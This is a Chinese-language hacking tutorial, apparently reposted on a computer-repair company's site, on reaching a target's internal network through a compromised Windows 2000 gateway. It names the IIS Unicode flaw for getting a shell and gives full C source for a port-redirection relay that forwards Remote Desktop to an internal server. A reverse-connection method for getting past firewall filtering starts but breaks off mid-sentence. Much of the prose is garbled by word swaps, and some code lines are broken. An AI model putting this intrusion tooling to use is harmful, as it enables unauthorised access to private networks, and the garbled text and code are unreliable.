如何突破TCP-IP过滤防火墙进入内网
现在很多企业大概公司基本上彀方法基本上都是申请一条连接到Internet的线路,宽带、DDN、ADSL、ISDN等等,然后用一台服务器做网关,服务器两块网卡,一块是连接到Internet,另一块是连接到内网的HUB大概互换机,然后内网的其他机器就可以经过网干系接到Internet。
大概有些人会这样想,我在内网之中,我们之间没有间接的连接,你没有措施打击我。事实并非云云,在内网的机器异样可能遭遭到来自Internet的打击,当然条件是打击者曾经获得网关服务器的某些权限,呵呵,这是不是废话?实在,Internet上很多做网关的服务器并未经过严格的安全配置,要获取权限也不是想象中的那么难。
Ok!废话就不说了,切入正题。我们的目标是用我们的TermClient[M$终端服务客户端]连接到仇人内网的TermServer机器。M$的终端服务是一个很好的远程办理工具,不是吗?呵呵。没有做特别说明的话,文中提到的服务器OS都为windows
2000。服务器为Linux或其他的话,原理也差不多,把程序稍微修正就行了。
<<第一部门:利用TCP socket数据转发进入没有防火墙掩护的内网>>
假定仇人网络拓扑如下图所示,没有安装防火墙或在网关服务器上做TCP/IP限制。
我们的目标是连接上仇人内网的Terminal
Server[192.168.1.3],由于没有措施间接和他创建连接,那么只要先从它的网关服务器上下手了。假如仇人网关服务器是M$的windows
2k,IIS有Unicode漏洞[现在要找些有漏洞的机器太容易了,但我只是scripts
kid,只会利用现成的漏洞做些简略的打击:(555),那么我们就失掉一个网关的shell了,我们可以在那下面运转我们的程序,虽然权限很低,但也可以做很多事情了。Ok!让我们来写一个做TCP
socket数据转发的小程序,让仇人的网关服务器老实的为我[202.1.1.1]和仇人内网的TermServer[192.168.1.3]之间转发数据。题外话:现实入侵历程是先获得网关服务器的权限,然后用他做跳板,进一步摸清它的外部网络拓扑布局,再做进一步的入侵,现在仇人的网络拓扑是我们给他设计的,哈哈。
打击流程如下:
<1>在网关服务器202.2.2.2运转我们的程序AgentGateWay,他监听TCP
3389端口[改成另外,那我们就要相应的修正TermClient了]等候我们去连接。
<2>我们202.1.1.1用TermClient连接到202.2.2.2:3389。
<3>202.2.2.2.接受202.1.1.1的连接,然后再创建一个TCP
socket连接到自己内网的TermServer[192.168.1.3]
<4>这样我们和仇人内网的TermServer之间的数据通道就建好了,接上去网关就老实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时候,实在出来的界面是仇人内网的192.168.1.3,觉得怎样样?:)
程序代码如下:
/指导指导指导指导指导指导指导指导指导指导指导****
Module Name:AgentGateWay.c
Date:2001/4/15
CopyRight(c) eyas
说明:端口重定向工具,在网关上运转,把端口重定向到内网的IP、PORT,
就可以进入内网了
sock[0]==>sClient sock[1]==>sTarget
指导指导指导指导指导指导指导指导指导指导指导****/
#include
#include
#include "TCPDataRedird.c"
#define TargetIP TEXT("192.168.1.3")
#define TargetPort (int)3389
#define ListenPort (int)3389//监听端口
#pragma comment(lib,"ws2_32.lib")
int main()
{
WSADATA wsd;
SOCKET sListen=INVALID_SOCKET,//本机监听的socket
sock[2];
struct sockaddr_in Local,Client,Target;
int iAddrSize;
HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
hThreadT2C=NULL;//T2C=TargetToClient
DWORD dwThreadID;
__try
{
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
printf("\nWSAStartup() failed:%d",GetLastError());
__leave;
}
sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(sListen==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
Local.sin_addr.s_addr=htonl(INADDR_ANY);
Local.sin_family=AF_INET;
Local.sin_port=htons(ListenPort);
Target.sin_family=AF_INET;
Target.sin_addr.s_addr=inet_addr(TargetIP);
Target.sin_port=htons(TargetPort);
if(bind(sListen,(struct sockaddr
*)&Local,sizeof(Local))==SOCKET_ERROR)
{
printf("\nbind() failed:%d",GetLastError());
__leave;
}
if(listen(sListen,1)==SOCKET_ERROR)
{
printf("\nlisten() failed:%d",GetLastError());
__leave;
}
//scoket循环
while(1)
{
printf("\n\n指导指导*Waiting Client Connect
to指导指导**\n\n");
iAddrSize=sizeof(Client);
//get socket sClient
sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);
if(sock[0]==INVALID_SOCKET)
{
printf("\naccept() failed:%d",GetLastError());
break;
}
printf("\nAccept client==>%s:%d",inet_ntoa(Client.sin_addr),
ntohs(Client.sin_port));
//create socket sTarget
sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(sock[1]==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//connect to target port
if(connect(sock[1],(struct sockaddr
*)&Target,sizeof(Target))==SOCKET_ERROR)
{
printf("\nconnect() failed:%d",GetLastError());
__leave;
}
printf("\nconnect to target 3389 success!");
//创建两个线程进行数据转发
hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
//等候两个线程结束
WaitForSingleObject(hThreadC2T,INFINITE);
WaitForSingleObject(hThreadT2C,INFINITE);
CloseHandle(hThreadC2T);
CloseHandle(hThreadT2C);
closesocket(sock[1]);
closesocket(sock[0]);
printf("\n\n指导指导*****Connection
Close指导指导指导*\n\n");
}//end of sock外循环
}//end of try
__finally
{
if(sListen!=INVALID_SOCKET) closesocket(sListen);
if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
WSACleanup();
}
return 0;
}
/指导指导指导指导指导指导指导指导指导指导指导指导*
Module:TCPDataRedird.c
Date:2001/4/16
CopyRight(c) eyas
HomePage:www.patching.net
Thanks to shotgun
说明:TCP socket数据转发,sock[0]==>sClient sock[1]==>sTarget
指导指导指导指导指导指导指导指导指导指导指导指导*/
#define BuffSize 20*1024 //缓冲区大小20k
//此函数卖力从Client读取数据,然后转发给Target
DWORD WINAPI TCPDataC2T(SOCKET* sock)
{
int iRet,
ret=-1,//select 前往值
iLeft,
idx,
iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize
char szSendToTargetBuff[BuffSize]=,
szRecvFromClientBuff[BuffSize]=;
fd_set fdread,fdwrite;
printf("\n\n指导指导*****Connection
Active指导指导指导*\n\n");
while(1)
{
FD_ZERO(&fdread);
FD_ZERO(&fdwrite);
FD_SET(sock[0],&fdread);
FD_SET(sock[1],&fdwrite);
if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
{
printf("\nselect() failed:%d",GetLastError());
break;
}
//printf("\nselect() return value ret=%d",ret);
if(ret>0)
{
//sClinet可读,client无数据要发送过去
if(FD_ISSET(sock[0],&fdread))
{
//吸收sock[0]发送来的数据
iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0);
if(iRet==SOCKET_ERROR)
{
printf("\nrecv() from sock[0] failed:%d",GetLastError());
break;
}
else if(iRet==0)
break;
printf("\nrecv %d bytes from sClinet.",iRet);
//把从client吸收到的数据存添加到发往target的缓冲区
memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet);
//刷新发往target的数据缓冲区以后buff大小
iSTTBCS+=iRet;
//清空吸收client数据的缓冲区
memset(szRecvFromClientBuff,0,BuffSize);
}
//sTarget可写,把从client吸收到的数据发送到target
if(FD_ISSET(sock[1],&fdwrite))
{
//转发数据到target的3389端口
iLeft=iSTTBCS;
idx=0;
while(iLeft>0)
{
iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0);
if(iRet==SOCKET_ERROR)
{
printf("\nsend() to target failed:%d",GetLastError());
break;
}
printf("\nsend %d bytes to target",iRet);
iLeft-=iRet;
idx+=iRet;
}
//清空缓冲区
memset(szSendToTargetBuff,0,BuffSize);
//重置发往target的数据缓冲区以后buff大小
iSTTBCS=0;
}
}//end of select ret
Sleep(1);
}//end of data send & recv循环
return 0;
}
//此函数卖力从target读取数据,然后发送给client
DWORD WINAPI TCPDataT2C(SOCKET* sock)
{
int iRet,
ret=-1,//select 前往值
iLeft,
idx,
iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize
char szRecvFromTargetBuff[BuffSize]=,
szSendToClientBuff[BuffSize]=;
fd_set fdread,fdwrite;
while(1)
{
FD_ZERO(&fdread);
FD_ZERO(&fdwrite);
FD_SET(sock[0],&fdwrite);
FD_SET(sock[1],&fdread);
if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
{
printf("\nselect() failed:%d",GetLastError());
break;
}
if(ret>0)
{
//sTarget可读,从target吸收数据
if(FD_ISSET(sock[1],&fdread))
{
//吸收target前往数据
iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0);
if(iRet==SOCKET_ERROR)
{
printf("\nrecv() from target failed:%d",GetLastError());
break;
}
else if(iRet==0)
break;
printf("\nrecv %d bytes from target",iRet);
//把从target吸收到的数据添加到发送到client的缓冲区
memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet);
//清空吸收target前往数据缓冲区
memset(szRecvFromTargetBuff,0,BuffSize);
//刷新发送到client的数据缓冲区以后大小
iSTCBCS+=iRet;
}
//client可写,发送target前往数据到client
if(FD_ISSET(sock[0],&fdwrite))
{
//发送target前往数据到client
iLeft=iSTCBCS;
idx=0;
while(iLeft>0)
{
iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0);
if(iRet==SOCKET_ERROR)
{
printf("\nsend() to Client failed:%d",GetLastError());
break;
}
printf("\nsend %d bytes to Client",iRet);
iLeft-=iRet;
idx+=iRet;
}
//清空缓冲区
memset(szSendToClientBuff,0,BuffSize);
iSTCBCS=0;
}
}//end of select ret
Sleep(1);
}//end of while
return 0;
}
(利用TCP socket转发和反弹TCP端口进入有防火墙掩护的内网)
事实上很多内网没有第一部门所说的那么简略啦,我们来看一个有防火墙掩护的内网,条件是这个防火墙对反弹TCP端口不做限制,限制了的话,又另当别论了。假定网络拓扑如下:
下面的网络拓扑是我在一次对朋友公司网站授权入侵历程中遇到的。
〈1〉我自己处于公司内网192.168.0.2,经过公司网关202.1.1.1到Internet,但我是网关的admin:)。
〈2〉仇人[实在是friend啦]的网关OS是2k adv
server,在外网网卡上做了TCP/IP限制,只开放了25,53,80,110,3306这几个TCP
PORT,经过一个漏洞,我失掉了一个shell,可以经过IE来执行系统命令,虽然权限很低。网关有终端服务,登陆验证漏洞补丁未安装,但输入法资助文件曾经被删除了,但是我们可以经过shell把输入法资助文件upload上去,由于他的系统权限没有设置好,我们可以写,呵呵。这样的话,我们只要可以或许连接到他的终端服务上去,我们就能绕过登陆验证,失掉admin权限了。怎样连接?有措施,用TCP
socket转发。和第一部门说的一样吗?有些差别。由于他做了TCP/IP限制,我们不能连接他,只能让他来连接我们了,TCP反弹端口,呵呵。
打击流程如下:
〈1〉在我的服务器202.1.1.1运转AgentMaster,监听TCP PORT
12345,等候202.2.2.2来连接,监听TCP PORT 3389,等候我192.168.0.2连接。
〈2〉在仇人网关机器202.2.2.2运转AgentSlave,连接到202.1.1.1 TCP PORT
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
